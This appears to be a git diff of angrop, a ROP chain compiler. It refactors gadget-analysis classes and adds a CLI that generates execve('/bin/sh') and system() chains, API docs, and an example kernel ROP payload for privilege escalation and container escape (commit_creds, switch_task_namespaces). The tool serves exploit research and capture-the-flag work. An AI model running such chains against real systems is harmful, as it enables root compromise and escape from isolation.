00000000..39fccbda --- /dev/null +++ b/angrop/rop_effect.py @@ -0,0 +1,215 @@ +class RopMemAccess: + """Holds information about memory accesses + Attributes: + addr_dependencies (set): All the registers that affect the memory address. + addr_controller (set): All the registers that can determine the symbolic memory access address by itself + addr_offset (int): Constant offset in the memory address relative to register(s) + addr_stack_controller (set): all the controlled gadgets on the stack that can determine the address by itself + data_dependencies (set): All the registers that affect the data written. 
+ data_controller (set): All the registers that can determine the symbolic data by itself + addr_constant (int): If the address is a constant it is stored here. + data_constant (int): If the data is constant it is stored here. + addr_size (int): Number of bits used for the address. + data_size (int): Number of bits used for data + """ + def __init__(self): + self.addr_dependencies = set() + self.addr_controllers = set() + self.addr_offset: int | None = None + self.addr_stack_controllers = set() + self.data_dependencies = set() + self.data_controllers = set() + self.data_stack_controllers = set() + self.addr_constant = None + self.stack_offset = None # addr_constant - init_sp + self.data_constant = None + self.addr_size = None + self.data_size = None + self.out_of_patch = False + self.op = None + + def is_valid(self): + """ + the memory access address must be one of + 1. constant + 2. controlled by registers + 3. controlled by controlled stack + """ + return self.addr_constant or self.addr_controllers or self.addr_stack_controllers + + def is_symbolic_access(self): + return self.addr_controllable() or bool(self.addr_dependencies) + + def addr_controllable(self): + return bool(self.addr_controllers or self.addr_stack_controllers) + + def data_controllable(self): + return bool(self.data_controllers or self.data_stack_controllers) + + def addr_data_independent(self): + return len(set(self.addr_controllers) & set(self.data_controllers)) == 0 and \ + len(set(self.addr_stack_controllers) & set(self.data_stack_controllers)) == 0 + + def __eq__(self, other): + if type(other) != RopMemAccess: + return False + if self.addr_dependencies != other.addr_dependencies or self.data_dependencies != other.data_dependencies: + return False + if self.addr_controllers != other.addr_controllers or self.data_controllers != other.data_controllers: + return False + if self.addr_constant != other.addr_constant or self.data_constant != other.data_constant: + return False + if self.addr_size != 
other.addr_size or self.data_size != other.data_size: + return False + return True + +class RopRegMove: + """ + Holds information about Register moves + Attributes: + from_reg (string): register that started with the data + to_reg (string): register that the data was moved to + bits (int): number of bits that were moved + """ + def __init__(self, from_reg, to_reg, bits): + self.from_reg = from_reg + self.to_reg = to_reg + self.bits = bits + + def __hash__(self): + return hash((self.from_reg, self.to_reg, self.bits)) + + def __eq__(self, other): + if type(other) != RopRegMove: + return False + return self.from_reg == other.from_reg and self.to_reg == other.to_reg and self.bits == other.bits + + def __lt__(self, other): + if type(other) != RopRegMove: + return False + t1 = (self.from_reg, self.to_reg, self.bits) + t2 = (other.from_reg, other.to_reg, other.bits) + return t1 < t2 + + def __repr__(self): + return f"RegMove: {self.to_reg} <= {self.from_reg} ({self.bits} bits)" + +class RopRegPop: + """ + a class to represent register pop effect + """ + def __init__(self, reg, bits): + assert type(reg) is str + self.reg = reg + self.bits = bits + + def __hash__(self): + return hash((self.reg, self.bits)) + + def __eq__(self, other): + if type(other) != RopRegPop: + return False + return self.reg == other.reg and self.bits == other.bits + + def __repr__(self): + return f"" + +class RopEffect: + """ + the overall effect of a gadget/rop_block + """ + def __init__(self): + + self.stack_change: int = None # type: ignore + + # register effect information + self.changed_regs = set() + # Stores the stack variables that each register depends on. + # Used to check for cases where two registers are popped from the same location. 
+ self.concrete_regs = {} + self.reg_dependencies = {} # like rax might depend on rbx, rcx + self.reg_controllers = {} # like rax might be able to be controlled by rbx (for any value of rcx) + self.reg_pops = set() + self.reg_moves = [] + + # memory effect information + self.mem_reads = [] + self.mem_writes = [] + self.mem_changes = [] + + # List of basic block addresses for gadgets with conditional branches + self.bbl_addrs = [] + # Instruction count to estimate complexity + self.isn_count: int = None # type: ignore + + self.pop_equal_set = set() # like pop rax; mov rbx, rax; they must be the same + + # Registers that affect path constraints + self.branch_dependencies = set() + self.has_conditional_branch: bool = None # type: ignore + + @property + def oop(self): + """ + whether the gadget contains out of patch access + """ + return any(m.out_of_patch for m in self.mem_reads + self.mem_writes + self.mem_changes) + + def has_symbolic_access(self): + return self.num_sym_mem_access > 0 + + @property + def max_stack_offset(self): + project = getattr(self, "project", None) + if project is None: + project = getattr(self, "_p", None) + res = self.stack_change - project.arch.bytes # type: ignore + for m in self.mem_reads + self.mem_writes + self.mem_changes: + if m.out_of_patch and m.stack_offset > res: + res = m.stack_offset + return res + + @property + def num_sym_mem_access(self): + """ + by definition, jmp_mem gadgets have one symbolic memory access, which is its PC + we take into account that + """ + # pylint: disable=no-member + accesses = self.mem_reads + self.mem_writes + self.mem_changes + res = len([x for x in accesses if x.is_symbolic_access()]) + if hasattr(self, "transit_type") and self.transit_type == 'jmp_mem' and self.pc_target.symbolic: # type: ignore + assert res > 0 + res -= 1 + return res + + @property + def popped_regs(self): + return {x.reg for x in self.reg_pops} + + def get_pop(self, reg): + for x in self.reg_pops: + if x.reg == reg: + return x + 
return None + + def clear_effect(self): + RopEffect.__init__(self) + + def import_effect(self, gadget): + gadget.copy_effect(self) + + def copy_effect(self, cp): + cp.stack_change = self.stack_change + cp.changed_regs = set(self.changed_regs) + cp.reg_pops = set(self.reg_pops) + cp.concrete_regs = dict(self.concrete_regs) + cp.reg_dependencies = dict(self.reg_dependencies) + cp.reg_controllers = dict(self.reg_controllers) + cp.reg_moves = list(self.reg_moves) + cp.mem_reads = list(self.mem_reads) + cp.mem_writes = list(self.mem_writes) + cp.mem_changes = list(self.mem_changes) + cp.bbl_addrs = list(self.bbl_addrs) + cp.isn_count = self.isn_count + return cp diff --git a/angrop/rop_gadget.py b/angrop/rop_gadget.py index 1c096d00..039ab5ac 100644 --- a/angrop/rop_gadget.py +++ b/angrop/rop_gadget.py @@ -1,122 +1,15 @@ from angr import Project from .rop_utils import addr_to_asmstring +from .rop_effect import RopEffect -class RopMemAccess: - """Holds information about memory accesses - Attributes: - addr_dependencies (set): All the registers that affect the memory address. - addr_controller (set): All the registers that can determine the symbolic memory access address by itself - addr_offset (int): Constant offset in the memory address relative to register(s) - addr_stack_controller (set): all the controlled gadgets on the stack that can determine the address by itself - data_dependencies (set): All the registers that affect the data written. - data_controller (set): All the registers that can determine the symbolic data by itself - addr_constant (int): If the address is a constant it is stored here. - data_constant (int): If the data is constant it is stored here. - addr_size (int): Number of bits used for the address. 
- data_size (int): Number of bits used for data - """ - def __init__(self): - self.addr_dependencies = set() - self.addr_controllers = set() - self.addr_offset: int | None = None - self.addr_stack_controllers = set() - self.data_dependencies = set() - self.data_controllers = set() - self.data_stack_controllers = set() - self.addr_constant = None - self.data_constant = None - self.addr_size = None - self.data_size = None - self.op = None - - def is_valid(self): - """ - the memory access address must be one of - 1. constant - 2. controlled by registers - 3. controlled by controlled stack - """ - return self.addr_constant or self.addr_controllers or self.addr_stack_controllers - - def is_symbolic_access(self): - return self.addr_controllable() or bool(self.addr_dependencies) - - def addr_controllable(self): - return bool(self.addr_controllers or self.addr_stack_controllers) - - def data_controllable(self): - return bool(self.data_controllers or self.data_stack_controllers) - - def addr_data_independent(self): - return len(set(self.addr_controllers) & set(self.data_controllers)) == 0 and \ - len(set(self.addr_stack_controllers) & set(self.data_stack_controllers)) == 0 - - def __hash__(self): - to_hash = sorted(self.addr_dependencies) + sorted(self.data_dependencies) + [self.addr_constant] + \ - [self.data_constant] + [self.addr_size] + [self.data_size] - return hash(tuple(to_hash)) - - def __eq__(self, other): - if type(other) != RopMemAccess: - return False - if self.addr_dependencies != other.addr_dependencies or self.data_dependencies != other.data_dependencies: - return False - if self.addr_controllers != other.addr_controllers or self.data_controllers != other.data_controllers: - return False - if self.addr_constant != other.addr_constant or self.data_constant != other.data_constant: - return False - if self.addr_size != other.addr_size or self.data_size != other.data_size: - return False - return True - -class RopRegMove: - """ - Holds information about Register 
moves - Attributes: - from_reg (string): register that started with the data - to_reg (string): register that the data was moved to - bits (int): number of bits that were moved - """ - def __init__(self, from_reg, to_reg, bits): - self.from_reg = from_reg - self.to_reg = to_reg - self.bits = bits - - def __hash__(self): - return hash((self.from_reg, self.to_reg, self.bits)) - - def __eq__(self, other): - if type(other) != RopRegMove: - return False - return self.from_reg == other.from_reg and self.to_reg == other.to_reg and self.bits == other.bits - - def __repr__(self): - return f"RegMove: {self.to_reg} <= {self.from_reg} ({self.bits} bits)" - -class RopGadget: +class RopGadget(RopEffect): """ Gadget objects """ def __init__(self, addr): + super().__init__() self.project: Project = None # type: ignore self.addr = addr - self.stack_change: int = None # type: ignore - - # register effect information - self.changed_regs = set() - self.popped_regs = set() - # Stores the stack variables that each register depends on. - # Used to check for cases where two registers are popped from the same location. - self.popped_reg_vars = {} - self.concrete_regs = {} - self.reg_dependencies = {} # like rax might depend on rbx, rcx - self.reg_controllers = {} # like rax might be able to be controlled by rbx (for any value of rcx) - self.reg_moves = [] - - # memory effect information - self.mem_reads = [] - self.mem_writes = [] - self.mem_changes = [] # gadget transition # we now support the following gadget transitions @@ -124,18 +17,12 @@ def __init__(self, addr): # 2. jmp_reg: jmp reg <- requires reg setting before using it (call falls here as well) # 3. 
jmp_mem: jmp [reg+X] <- requires mem setting before using it (call falls here as well) self.transit_type: str = None # type: ignore - - self.pc_offset = None # for pop_pc, ret is basically pc_offset == stack_change - arch.bytes - self.pc_reg = None # for jmp_reg, which register it jumps to - self.pc_target = None # for jmp_mem, where it jumps to - - # List of basic block addresses for gadgets with conditional branches - self.bbl_addrs = [] - # Registers that affect path constraints - self.constraint_regs = set() - # Instruction count to estimate complexity - self.isn_count: int = None # type: ignore - self.has_conditional_branch: bool = None # type: ignore + # for pop_pc, ret is basically pc_offset == stack_change - arch.bytes + self.pc_offset: int = None # type: ignore + # for jmp_reg, which register it jumps to + self.pc_reg: str = None # type: ignore + # for jmp_mem, where it jumps to + self.pc_target: int = None # type: ignore @property def self_contained(self): @@ -144,18 +31,9 @@ def self_contained(self): e.g. 
'jmp_reg' gadgets requires another one setting the registers (a gadget like mov rax, [rsp]; add rsp, 8; jmp rax will be considered pop_pc) """ - return (not self.has_conditional_branch) and self.transit_type == 'pop_pc' - - @property - def num_sym_mem_access(self): - accesses = set(self.mem_reads + self.mem_writes + self.mem_changes) - return len([x for x in accesses if x.is_symbolic_access()]) - - def has_symbolic_access(self): - accesses = set(self.mem_reads + self.mem_writes + self.mem_changes) - return any(x.is_symbolic_access() for x in accesses) + return (not self.has_conditional_branch) and self.transit_type == 'pop_pc' and not self.oop - def dstr(self): + def dstr(self) -> str: return "; ".join(addr_to_asmstring(self.project, addr) for addr in self.bbl_addrs) def pp(self): @@ -165,7 +43,7 @@ def __str__(self): s = "Gadget %#x\n" % self.addr s += "Stack change: %#x\n" % self.stack_change s += "Changed registers: " + str(self.changed_regs) + "\n" - s += "Popped registers: " + str(self.popped_regs) + "\n" + s += "Popped registers: " + str(self.reg_pops) + "\n" for move in self.reg_moves: s += "Register move: [%s to %s, %d bits]\n" % (move.from_reg, move.to_reg, move.bits) s += "Register dependencies:\n" @@ -214,39 +92,39 @@ def __str__(self): s += str(list(mem_access.data_dependencies)) + "\n" return s - def __repr__(self): + def __repr__(self) -> str: return "<Gadget %#x>" % self.addr def copy(self): out = self.__class__(self.addr) + self.copy_effect(out) out.project = self.project out.addr = self.addr - out.changed_regs = set(self.changed_regs) - out.popped_regs = set(self.popped_regs) - out.popped_reg_vars = dict(self.popped_reg_vars) - out.concrete_regs = dict(self.concrete_regs) - out.reg_dependencies = dict(self.reg_dependencies) - out.reg_controllers = dict(self.reg_controllers) - out.stack_change = self.stack_change - out.mem_reads = list(self.mem_reads) - out.mem_changes = list(self.mem_changes) - out.mem_writes = list(self.mem_writes) - out.reg_moves = 
list(self.reg_moves) out.transit_type = self.transit_type + out.pc_offset = self.pc_offset out.pc_reg = self.pc_reg + out.pc_target = self.pc_target + out.branch_dependencies = set(self.branch_dependencies) + out.has_conditional_branch = self.has_conditional_branch return out + def __getstate__(self): + state = self.__dict__.copy() + state['project'] = None + return state + + def __setstate__(self, state): + self.__dict__.update(state) class PivotGadget(RopGadget): """ stack pivot gadget, the definition of a PivotGadget is that it can arbitrarily control the stack pointer register, and do the pivot exactly once - TODO: so currently, it cannot directly construct a `pop rbp; leave ret;` - chain to pivot stack """ def __init__(self, addr): super().__init__(addr) - self.stack_change_after_pivot = None + self.stack_change_before_pivot: int = None # type: ignore + self.stack_change_after_pivot: int = None # type: ignore # TODO: sp_controllers can be registers, payload on stack, and symbolic read data # but we do not handle symbolic read data, yet self.sp_reg_controllers = set() diff --git a/angrop/rop_utils.py b/angrop/rop_utils.py index 4e105ace..d920c204 100644 --- a/angrop/rop_utils.py +++ b/angrop/rop_utils.py @@ -1,3 +1,4 @@ +import sys import time import signal @@ -45,24 +46,49 @@ def get_ast_controllers(state, ast, reg_deps) -> set: if not ast.symbolic: return controllers - # make sure it can't be symbolic if all the registers are constrained - constraints = [] - for reg in reg_deps: - if not state.registers.load(reg).symbolic: - continue - constraints.append(state.registers.load(reg) == test_val) - if len(state.solver.eval_upto(ast, 2, extra_constraints=constraints)) > 1: - return controllers + # make sure only variables are registers + var_names = {} + for var in ast.variables: + if not var.startswith("sreg_"): + return controllers + reg = var[5:].split("-")[0] + var_names[reg] = var + + # strip operations that dont affect control + strip_ast = ast + while True: 
+ if strip_ast.op == "Extract": + strip_ast = strip_ast.args[2] + elif strip_ast.op == "Reverse": + strip_ast = strip_ast.args[0] + elif strip_ast.op == "__add__" and len(strip_ast.args) == 2 and not strip_ast.args[1].symbolic: + strip_ast = strip_ast.args[0] + elif strip_ast.op in ('ZeroExt', 'SignExt'): + strip_ast = strip_ast.args[1] + else: + break + + # fast path just a BVS of a register + if len(strip_ast.variables) == 1 and strip_ast.op == "BVS": + assert len(reg_deps) == 1 + # return that one register as the controller + return set(reg_deps) for reg in reg_deps: - extra_constraints = [] + test_ast = ast for r in [a for a in reg_deps if a != reg]: # for bp and registers that might be set if not state.registers.load(r).symbolic: continue - extra_constraints.append(state.registers.load(r) == test_val) - - if unconstrained_check(state, ast, extra_constraints=extra_constraints): + reg_sym_val = state.registers.load(r) + test_ast = claripy.algorithm.replace(expr=test_ast, + old=reg_sym_val, + new=claripy.BVV(test_val, reg_sym_val.size())) + # we consider 32-bit control on 64-bit system valid + if state.project.arch.bits == 64 and test_ast.op in ('ZeroExt', 'SignExt') and test_ast.args[0] == 32: + test_ast = test_ast.args[1] + + if fast_unconstrained_check(state, test_ast): controllers.add(reg) return controllers @@ -90,14 +116,11 @@ def get_ast_const_offset(state, ast, reg_deps) -> int: return state.solver.eval(ast) -def unconstrained_check(state, ast, extra_constraints=None): - """ - Attempts to check if an ast is completely unconstrained - :param state: the state to use - :param ast: the ast to check - :return: True if the ast is probably completely unconstrained - """ +def loose_constrained_check(state, ast, extra_constraints=None): size = ast.size() + # we are fine with partial control on 64bit system + if size == 64: + size = 32 test_val_0 = 0x0 test_val_1 = (1 << size) - 1 test_val_2 = int("1010"*16, 2) % (1 << size) @@ -107,18 +130,37 @@ def 
unconstrained_check(state, ast, extra_constraints=None): % (1 << size) extra = extra_constraints if extra_constraints is not None else [] + cnt = 0 if not state.solver.satisfiable(extra_constraints= extra + [ast == test_val_0]): - return False + cnt += 1 if not state.solver.satisfiable(extra_constraints= extra + [ast == test_val_1]): + cnt += 1 + if cnt > 1: return False if not state.solver.satisfiable(extra_constraints= extra + [ast == test_val_2]): + cnt += 1 + if cnt > 1: return False if not state.solver.satisfiable(extra_constraints= extra + [ast == test_val_3]): + cnt += 1 + if cnt > 1: return False if not state.solver.satisfiable(extra_constraints= extra + [ast == test_val_4]): + cnt += 1 + if cnt > 1: return False return True +def unconstrained_check(state, ast): + """ + Attempts to check if an ast is completely unconstrained + :param state: the state to use + :param ast: the ast to check + :return: True if the ast is probably completely unconstrained + """ + if ast.variables.intersection(state.solver._solver.variables): + return False + return True def fast_unconstrained_check(state, ast): """ @@ -127,22 +169,69 @@ def fast_unconstrained_check(state, ast): :param ast: the ast to check :return: True if the ast is probably unconstrained """ - good_ops = {"Extract", "BVS", "__add__", "__sub__", "Reverse"} - if len(ast.variables) != 1: - return unconstrained_check(state, ast) + good_ops = {"Extract", "BVS", "__add__", "__sub__", "__xor__", "Reverse", "BVV"} + + if not ast.symbolic: + return False passes_prefilter = True + for a in ast.children_asts(): if a.op not in good_ops: passes_prefilter = False + # check for x __add__ x which is constrained + seen_vars = set() + for child in a.args: + if isinstance(child, (int, str)) or child is None: + continue + if len(child.variables & seen_vars): + passes_prefilter = False + seen_vars |= child.variables + if ast.op not in good_ops: passes_prefilter = False if passes_prefilter: return True - return 
unconstrained_check(state, ast) + def must_be_constrained(ast): + if ast.op == "__and__": + for arg in ast.args: + if not arg.symbolic and arg.concrete_value != (1< 0: # deduct f's run time from the saved timer - old_time_left -= int(time.time() - start_time) - signal.signal(signal.SIGALRM, old) - signal.alarm(old_time_left) + if old == handler: + if old_time_left > 0: # deduct f's run time from the saved timer + old_time_left -= int(time.time() - start_time) + signal.signal(signal.SIGALRM, old) + signal.alarm(old_time_left) return result return new_f return decorate diff --git a/angrop/rop_value.py b/angrop/rop_value.py index 432cb998..4050d74b 100644 --- a/angrop/rop_value.py +++ b/angrop/rop_value.py @@ -4,6 +4,7 @@ class RopValue: """ This class represents a value that needs to be concretized in a ROP chain Automatically handles rebase + TODO: the type situation is pretty bad here """ def __init__(self, value, project): if not isinstance(value, (int, str, claripy.ast.bv.BV)): @@ -18,7 +19,8 @@ def __init__(self, value, project): self._value = value # when rebase is needed, value here holds the offset self._project = project - self._rebase = None # rebase needs to be either specified or inferred + # rebase needs to be either specified or inferred + self._rebase: bool = None # type: ignore self._code_base = None self._project_update() @@ -34,22 +36,22 @@ def _project_update(self): def __add__(self, other): cp = self.copy() if type(other) is int: - cp._value += other + cp._value += other # type: ignore elif isinstance(other, RopValue): - cp._value += other._value + cp._value += other._value # type: ignore cp._rebase |= other._rebase else: raise ValueError(f"Can't add {other} to RopValue!") return cp def determined(self, chain): - res = chain._blank_state.solver.eval_upto(self._value, 2) + res = chain._blank_state.solver.eval_to_ast(self._value, 2) return len(res) <= 1 def rebase_ptr(self): pie = self._project.loader.main_object.pic if pie: - self._value -= 
self._code_base + self._value -= self._code_base # type: ignore self._rebase = True def rebase_analysis(self, chain=None): @@ -64,7 +66,7 @@ def rebase_analysis(self, chain=None): # if fully symbolic, we don't know whether it should be rebased or not if self.symbolic: if chain is None or not self.determined(chain): - self._rebase = None + self._rebase = None # type: ignore return concreted = chain._blank_state.solver.eval(self._value) else: @@ -75,23 +77,24 @@ def rebase_analysis(self, chain=None): if concreted < self._project.loader.min_addr or concreted >= self._project.loader.max_addr: self._rebase = False return + # FIXME: currently, we only rebase pointers in the main_object for obj in self._project.loader.all_elf_objects: if obj.pic and obj.min_addr <= concreted < obj.max_addr: + if obj != self._project.loader.main_object: + continue self._value -= obj.min_addr self._rebase = True - if obj != self._project.loader.main_object: - raise NotImplementedError("Currently, angrop does not support rebase library address!") return self._rebase = False return @property - def symbolic(self): - return self._value.symbolic + def symbolic(self) -> bool: + return self._value.symbolic # type: ignore @property - def ast(self): - assert self._value.symbolic + def ast(self) -> claripy.ast.bv.BV: + assert self._value.symbolic # type: ignore return self.data @property @@ -100,16 +103,16 @@ def is_register(self): @property def concreted(self): - assert not self._value.symbolic + assert not self._value.symbolic # type: ignore if self.rebase: - return (self._code_base + self._value).concrete_value - return self._value.concrete_value + return (self._code_base + self._value).concrete_value # type: ignore + return self._value.concrete_value # type: ignore @property - def data(self): + def data(self) -> claripy.ast.bv.BV: if self.rebase: - return self._code_base + self._value - return self._value + return self._code_base + self._value # type: ignore + return self._value # type: ignore 
@property def rebase(self): @@ -127,3 +130,11 @@ def copy(self): cp._rebase = self._rebase cp._code_base = self._code_base return cp + + def __getstate__(self): + state = self.__dict__.copy() + state['_project'] = None + return state + + def __setstate__(self, state): + self.__dict__.update(state) diff --git a/bin/angrop-cli b/bin/angrop-cli new file mode 100755 index 00000000..3baf8f07 --- /dev/null +++ b/bin/angrop-cli @@ -0,0 +1,127 @@ +#!/usr/bin/env python + +""" +developed within 30min at DEF CON 33 :P +""" + +import os +import hashlib +from multiprocessing import cpu_count + +import angr +import angrop +from pwnlib.elf import ELF + +def find_gadgets(path, rop, optimize=False): + cache_path = get_cache_path(path) + if not os.path.exists(cache_path): + gadgets = rop.find_gadgets(processes=cpu_count(), optimize=optimize) + rop.save_gadgets(cache_path) + else: + rop.load_gadgets(cache_path, optimize=optimize) + return rop._all_gadgets + +def dump_gadgets(args): + proj = angr.Project(args.path, load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1, only_check_near_rets=False) + gadgets = find_gadgets(args.path, rop) + records = [(g, g.dstr()) for g in gadgets] + records = sorted(records, key=lambda x: x[1]) + max_addr = proj.loader.main_object.max_addr + max_addr_str_len = len(hex(max_addr)) + for g, dstr in records: + addr_str = hex(g.addr).rjust(max_addr_str_len, '0') + contained = str(g.self_contained).lower() + print(addr_str + f': {contained:6s}: {dstr}') + +def get_cache_path(binary): + # hash binary contents for rop cache name + binhash = hashlib.md5(open(binary, 'rb').read()).hexdigest() + return os.path.join("/tmp", "%s-%s-rop" % (os.path.basename(binary), binhash)) + +def dump_chain(args): + e = ELF(args.path) + proj = angr.Project(args.path, load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1, only_check_near_rets=False) + 
find_gadgets(args.path, rop, optimize=not args.fast) + match args.target: + case "execve": + execve_addr = None + if 'execve' in e.plt: + execve_addr = e.plt['execve'] + if execve_addr is None and 'execve' in e.symbols: + execve_addr = e.symbols['execve'] + + if execve_addr is None: + print("this binary doesn't have execve function") + chain = rop.execve() + chain.print_payload_code() + else: + sh = next(e.search(b'/bin/sh\x00'), None) + if sh is None: + sh = rop.chain_builder._reg_setter._get_ptr_to_writable(proj.arch.bytes) + chain = rop.write_to_mem(sh, b'/bin/sh\x00') + rop.func_call("execve", [sh, 0, 0], needs_return=False) + else: + chain = rop.func_call("execve", [sh, 0, 0], needs_return=False) + chain.print_payload_code() + #import IPython; IPython.embed() + case "system": + system_addr = None + if 'system' in e.plt: + system_addr = e.plt['system'] + if system_addr is None and 'system' in e.symbols: + system_addr = e.symbols['system'] + if system_addr is None: + raise RuntimeError("this binary does not have system function") + sh = next(e.search(b'sh\x00')) + chain = rop.func_call(system_addr, [sh], needs_return=False) + chain.print_payload_code() + #import IPython; IPython.embed() + case "arg1" | "arg2" | "arg3" | "arg4": + arg_cnt = int(args.target[3:]) + args = [0x41414141]*arg_cnt + chain = rop.func_call(0xdeadbeef, args, needs_return=False) + chain.print_payload_code() + #import IPython; IPython.embed() + case _: + raise NotImplementedError() + +if __name__ == '__main__': + import sys + import argparse + + + usage = '%(prog)s [] ' + parser = argparse.ArgumentParser(usage=usage) + + subparsers = parser.add_subparsers(help='sub-command help') + + # dumper + dumper_parser = subparsers.add_parser('dump', help='dump gadget module') + dumper_parser.add_argument('path', help="which binary to work on") + dumper_parser.set_defaults(module="dump") + + # chainer + chainer_parser = subparsers.add_parser('chain', help='chain building module') + 
chainer_parser.add_argument('path', help="which binary to work on") + chainer_parser.add_argument('-t', '--target', type=str, help="target goal", choices=["execve", "system", "arg1", "arg2", "arg3", "arg4"]) + chainer_parser.add_argument('-f', '--fast', action="store_true", help="whether to skip optimization") + chainer_parser.set_defaults(module="chain") + + # parse arguments + args = parser.parse_args() + if "module" not in args: + parser.print_help() + sys.exit() + module = args.module + + # handle each componet request + match module: + case "dump": + dump_gadgets(args) + case "chain": + dump_chain(args) + case _: + parser.print_help() + sys.exit() + diff --git a/docs/pythonapi.md b/docs/pythonapi.md new file mode 100644 index 00000000..ee43fcff --- /dev/null +++ b/docs/pythonapi.md @@ -0,0 +1,102 @@ +# Python API + +## Configuration +```python +proj = angr.Project() +rop = proj.analyses.ROP() +``` +common configs: +* `only_check_near_rets`: If true we skip blocks that are not near rets, default is true +* `max_block_size`: the maximum size of each basic block to consider, the default [varies by arch](https://github.com/angr/angrop/blob/master/angrop/arch.py#L41) +* `kernel_mode`: is the target linux kernel, default is false +* `fast_mode`: true/false, if set to None makes a decision based on the size of the binary (default is None). If True, skip gadgets with conditonal\_branches, floating point operations, jumps, and allow smaller gadget size + +## Find Gadgets +``` +# find gadgets using multiprocessing +rop.find_gadgets() + +# find gadgets using single thread, good for performance evaluation +rop.find_gadgets_single_threaded() +``` +common parameters: +* `optimize`: whether to perform graph optimization after finishing finding gadgets. 
It can save time when you only want to find gadgets +* `processes`: the number of processes for multiprocessing, the default is 4 +* `show_progress`: whether to show the progress bar, default is true + +## Basic Usage + +```python +# angrop includes methods to create certain common chains + +# setting registers +chain = rop.set_regs(rax=0x1337, rbx=0x56565656) + +# moving registers +chain = rop.move_regs(rax='rdx') + +# adding values to memory +chain = rop.add_to_mem(0x804f124, 0x41414141) + +# writing to memory +# writes "/bin/sh\0" to address 0x61b100 +chain = rop.write_to_mem(0x61b100, b"/bin/sh\0") + +# find stack pivoting chain, the argument can be a register or an address +chain = rop.pivot('rax') +chain = rop.pivot(0x41414140) + +# calling functions +chain = rop.func_call("read", [0, 0x804f000, 0x100]) + +# invoke syscall with arguments +chain = rop.do_syscall(0, [0, 0x41414141, 0x100], needs_return=False) + +# generate an `execve("/bin/sh", NULL, NULL)` chain +chain = rop.execve() + +# shifting stack pointer like add rsp, 0x8; ret (this gadget shifts rsp by 0x10) +chain = rop.shift(0x10) + +# generating ret-sled chains like ret*0x10, but works for ARM/MIPS as well +chain = rop.retsled(0x40) + +# bad bytes can be specified to generate chains with no bad bytes +rop.set_badbytes([0x0, 0x0a]) +chain = rop.set_regs(eax=0) + +# chains can be added together to chain operations +chain = rop.write_to_mem(0x61b100, b"/home/ctf/flag\x00") + rop.func_call("open", [0x61b100, os.O_RDONLY]) + ... + +# chains can be printed for copy pasting into exploits +>>> chain.print_payload_code() +chain = b"" +chain += p64(0x410b23) # pop rax; ret +chain += p64(0x74632f656d6f682f) +chain += p64(0x404dc0) # pop rbx; ret +chain += p64(0x61b0f8) +chain += p64(0x40ab63) # mov qword ptr [rbx + 8], rax; add rsp, 0x10; pop rbx; ret +... 
+ +# chains can be pretty-printed for debugging +>>> chain.pp() +0x0000000000034573: pop rcx; ret + 0x61b0f8 +0x000000000004a1dd: pop rdi; mov edx, 0x89480002; ret + 0x68732f6e69622f +0x00000000000d5a94: mov qword ptr [rcx + 8], rdi; ret + +``` + +## Advanced Usage + +* register as an argument +If you want to directly use a register for an argument, you can do it like this: +~~~ +[ins] In [3]: rop.func_call("prepare_kernel_cred", (0x41414141, 0x42424242), preserve_regs={'rdi'}).pp() +0xffffffff81489752: pop rsi; ret + 0x42424242 +0xffffffff8114d660: + +~~~ +Here, since we tell it to preserve the `rdi` register, it will overrule the `0x41414141` argument and ignore it. diff --git a/examples/linux_escape_chain/payload_code.txt b/examples/linux_escape_chain/payload_code.txt new file mode 100644 index 00000000..71fa5c99 --- /dev/null +++ b/examples/linux_escape_chain/payload_code.txt @@ -0,0 +1,23 @@ +chain = b"" +chain += p64(0xffffffff8189c0de) # pop rdi; ret +chain += p64(0xffffffff8368b220) # init_cred +chain += p64(0xffffffff8114d3a0) # commit_creds +chain += p64(0xffffffff8189c0de) # pop rdi; ret +chain += p64(0x1) +chain += p64(0xffffffff8113fb50) # find_task_by_vpid +chain += p64(0xffffffff816ea64d) # pop rdi; mov esi, 0x8948ffd2; ret +chain += p64(0xffffffff83600118) +chain += p64(0xffffffff818be4b4) # pop rsi; ret +chain += p64(0xffffffff82504104) # srso_alias_safe_ret +chain += p64(0xffffffff810cd6f0) # native_set_pte +chain += p64(0xffffffff818765a0) # pop rbp; ret +chain += p64(0xffffffff836000d0) +chain += p64(0xffffffff81aca592) # push rax; pop rdi; call qword ptr [rbp + 0x48] +chain += p64(0xffffffff818be4b4) # pop rsi; ret +chain += p64(0xffffffff8368ad00) # init_nsproxy +chain += p64(0xffffffff8114b250) # switch_task_namespaces +chain += p64(0xffffffff8110a370) # __x64_sys_fork +chain += p64(0xffffffff8189c0de) # pop rdi; ret +chain += p64(0xffffffff) +chain += p64(0xffffffff81213580) # msleep +chain += p64(0xffffffff819c4490) diff --git 
a/examples/linux_escape_chain/pp.txt b/examples/linux_escape_chain/pp.txt new file mode 100644 index 00000000..554b5da3 --- /dev/null +++ b/examples/linux_escape_chain/pp.txt @@ -0,0 +1,23 @@ +0xffffffff8189c0de: pop rdi; ret + 0xffffffff8368b220 +0xffffffff8114d3a0: +0xffffffff8189c0de: pop rdi; ret + 0x1 +0xffffffff8113fb50: +0xffffffff816ea64d: pop rdi; mov esi, 0x8948ffd2; ret + 0xffffffff83600118 +0xffffffff818be4b4: pop rsi; ret + 0xffffffff82504104 +0xffffffff810cd6f0: mov qword ptr [rdi], rsi; xor esi, esi; xor edi, edi; jmp 0xffffffff822a7e60; ret +0xffffffff818765a0: pop rbp; ret + 0xffffffff836000d0 +0xffffffff81aca592: push rax; pop rdi; call qword ptr [rbp + 0x48] +0xffffffff818be4b4: pop rsi; ret + 0xffffffff8368ad00 +0xffffffff8114b250: +0xffffffff8110a370: <__x64_sys_fork> +0xffffffff8189c0de: pop rdi; ret + 0xffffffff +0xffffffff81213580: + + diff --git a/examples/linux_escape_chain/solve.py b/examples/linux_escape_chain/solve.py new file mode 100644 index 00000000..8d4975bc --- /dev/null +++ b/examples/linux_escape_chain/solve.py @@ -0,0 +1,48 @@ +""" +On my 16-core machine, it takes: +404s to analyze the gadgets +10s to optimize the graph +0.7s to generate the chain + +""" +import os +import time +import logging +from multiprocessing import cpu_count + +import angr +import angrop # pylint: disable=unused-import + +logging.getLogger("cle.backends.elf.elf").setLevel("ERROR") + +proj = angr.Project("./vmlinux_sym") +rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, max_block_size=12, kernel_mode=True) +cpu_num = cpu_count() + +start = time.time() +cache = 